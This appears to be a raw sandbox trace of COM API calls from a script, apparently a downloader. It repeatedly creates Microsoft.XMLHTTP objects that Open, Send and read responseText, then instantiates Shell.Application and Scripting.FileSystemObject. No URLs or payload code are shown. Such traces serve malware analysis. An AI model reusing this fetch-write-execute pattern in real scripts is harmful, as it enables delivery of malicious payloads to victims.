	[0282.192] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0282.192] XMLHTTPRequest:IUnknown:Release (This=0x49c5c58) returned 0x0
	[0282.192] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0282.192] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0282.192] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0282.192] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0282.192] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0282.192] longjmp () 
	[0282.193] longjmp () 
	[0282.193] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0282.193] SysStringLen (param_1=0x0) returned 0x0
	[0282.193] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0282.193] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0282.193] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0282.193] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0282.193] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7208) returned 0x0
	[0282.193] ??2@YAPEAX_K@Z () returned 0x62f330
	[0282.193] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7208, pUnkSite=0x62f330) 
	[0282.193] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0282.193] XMLHTTPRequest:IUnknown:Release (This=0x49c7208) returned 0x0
	[0282.193] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0282.193] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0282.194] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0282.194] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0282.194] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0282.194] longjmp () 
	[0282.194] longjmp () 
	[0282.194] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0282.194] SysStringLen (param_1=0x0) returned 0x0
	[0282.194] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0282.194] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0282.194] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c72a0) returned 0x0
	[0282.194] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0282.194] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7308) returned 0x0
	[0282.195] ??2@YAPEAX_K@Z () returned 0x62f310
	[0282.195] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7308, pUnkSite=0x62f310) 
	[0282.195] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0282.195] XMLHTTPRequest:IUnknown:Release (This=0x49c7308) returned 0x0
	[0282.195] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c72a0) returned 0x0
	[0282.195] XMLHTTPRequest:IUnknown:AddRef (This=0x49c72a0) returned 0x3
	[0282.195] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0282.195] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0282.195] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0282.195] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0282.195] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0282.195] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0283.996] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0283.996] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0283.996] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0283.996] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0283.996] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0283.996] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0283.997] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0283.997] SysStringLen (param_1=0x0) returned 0x0
	[0283.997] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0283.997] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0283.997] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0283.997] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0283.997] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0283.997] ??2@YAPEAX_K@Z () returned 0x62f350
	[0283.997] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0283.997] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0283.997] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0283.997] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0283.997] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0283.997] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0283.997] SysStringLen (param_1=0x0) returned 0x0
	[0283.997] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0284.001] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0284.001] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0284.001] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0284.001] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0284.001] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0284.001] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0284.904] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0284.904] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0284.904] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0284.905] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0284.906] SysStringLen (param_1=0x0) returned 0x0
	[0284.906] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0284.906] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0284.906] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c72a0) returned 0x0
	[0284.906] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0284.906] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0284.906] ??2@YAPEAX_K@Z () returned 0x62f310
	[0284.906] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f310) 
	[0284.906] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0284.906] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0284.907] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c72a0) returned 0x0
	[0284.907] XMLHTTPRequest:IUnknown:AddRef (This=0x49c72a0) returned 0x3
	[0284.907] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0284.907] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0284.909] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0284.910] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0284.910] SysStringLen (param_1=0x0) returned 0x0
	[0284.910] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0284.910] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0284.910] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0284.910] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0284.910] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7518) returned 0x0
	[0284.910] ??2@YAPEAX_K@Z () returned 0x62f330
	[0284.910] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7518, pUnkSite=0x62f330) 
